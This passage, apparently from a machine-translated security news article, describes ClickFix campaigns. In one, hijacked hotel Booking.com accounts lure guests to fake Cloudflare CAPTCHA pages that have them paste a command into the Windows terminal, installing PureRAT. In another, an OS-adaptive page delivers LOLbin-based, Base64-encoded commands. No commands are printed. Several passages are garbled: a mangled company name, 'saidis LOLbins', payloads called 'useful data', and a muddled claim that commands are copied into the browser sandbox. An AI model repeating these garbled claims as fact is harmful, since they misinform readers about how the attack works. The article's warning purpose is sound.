Another campaign documented from Sekoia, aimed at Windows users. The attackers first hacked the hotel's account on Booking.com or another online travel service. Using information stored in compromised accounts, attackers contact people who have pending reservations, and this ability immediately gains the trust of many targets who are eager to follow instructions to ensure their stay is not cancelled.
The site ends up presenting a fake CAPTCHA notification that has an almost identical appearance to those required by Cloudflare's content delivery network. The proof that the notification requires to confirm that there is a person at the keyboard is to copy a line of text and paste it into the Windows terminal. In this case, the machine is infected with malware tracked as PureRAT.
In the meantime, click Security. reported a ClickFix campaign with a page that “adapts to the device you’re visiting from.” Depending on the OS, the page will deliver useful data for Windows or macOS. Many of these Microsoft payloads saidis LOLbins, the name of binaries that use a technique known as “living off the land.” These scripts rely solely on native capabilities built into the operating system. By not writing malicious files to disk, endpoint security is further weakened.
Commands, which are often Base64 encoded to make them unreadable to humans, are often copied into the browser's sandbox—the part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or malicious scripts. Many security tools fail to monitor and flag these activities as potentially malicious.
Attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or instant messengers. According to many users, precautions do not apply to sites that offer to copy a piece of text and paste it into an unfamiliar window. When instructions arrive via email from a well-known hotel or appear at the top of Google results, targets can be caught off guard.
With many families gathering for a variety of holiday dinners in the coming weeks, the ClickFix scam is worth mentioning to family members seeking safety advice. Microsoft Defender and other endpoint protection programs offer some protection against these attacks, but in some cases they can be bypassed. This means that awareness is the best countermeasure for now.
